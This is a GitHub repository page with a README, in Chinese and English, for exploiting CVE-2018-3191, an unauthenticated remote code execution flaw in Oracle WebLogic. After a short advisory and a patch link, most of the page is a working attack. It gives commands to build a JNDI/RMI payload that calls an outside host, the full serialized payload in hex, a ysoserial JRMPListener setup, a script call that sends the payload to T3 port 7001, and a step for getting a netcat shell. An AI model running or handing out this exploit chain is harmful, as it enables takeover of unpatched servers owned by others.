CVE-2018-3191
Switch branches/tags
Nothing to show
Clone or download
Latest commit a440fe6 Oct 25, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md update Oct 24, 2018
generate-payload.jpg update Oct 24, 2018
get-tcp-shell.jpg update Oct 24, 2018
jas502n-poc.txt update Oct 24, 2018
jas502n.txt update Oct 24, 2018
listener-port-rmi.jpg update Oct 24, 2018
push.sh update Oct 24, 2018
send-payload.jpg update Oct 24, 2018
send.jpg update Oct 24, 2018
weblogic-web.jpg update Oct 24, 2018
weblogic.jpg update Oct 24, 2018
weblogic.py update Oct 24, 2018
ysoserial-0.0.6-SNAPSHOT-BETA-all.jar update Oct 24, 2018

README.md

Weblogic-CVE-2018-3191远程代码命令执行漏洞

weblogic For Docker 环境

0x00 简介

北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(Critical Patch Update)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。

该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。

Oracle官方CPU链接:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

官方修复方案:

Oracle官方已经在10月关键补丁更新CPU(Critical Patch Update)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

0x01 Generate Payload

Usage:

`

java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n >jas502n.txt

https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar

wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar

java -jar weblogic-spring-jndi.jar <jndi_address>

Example:

java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp

weblogic-spring-jndi-12.2.1.3.jar for weblogic:

12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar for weblogic:

10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1

`

payload(hex):

aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740025726d693a2f2f7777772e63616e796f757365656d652e63633a363636382f4a61733530326e

0x02 Linsten java RMI

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"

root@374bb3d9a2d8:/tools# ./rmi.sh 
* Opening JRMP listener on 6668

0x03 Send Payload to T3

python weblogic.py www.canyouseeme.cc 7001 jas502n.txt

0x04 Get-Nc-Shell

0x05 参考链接

https://github.com/voidfyoo/CVE-2018-3191

YouTube 演示视频

CVE-2018-3191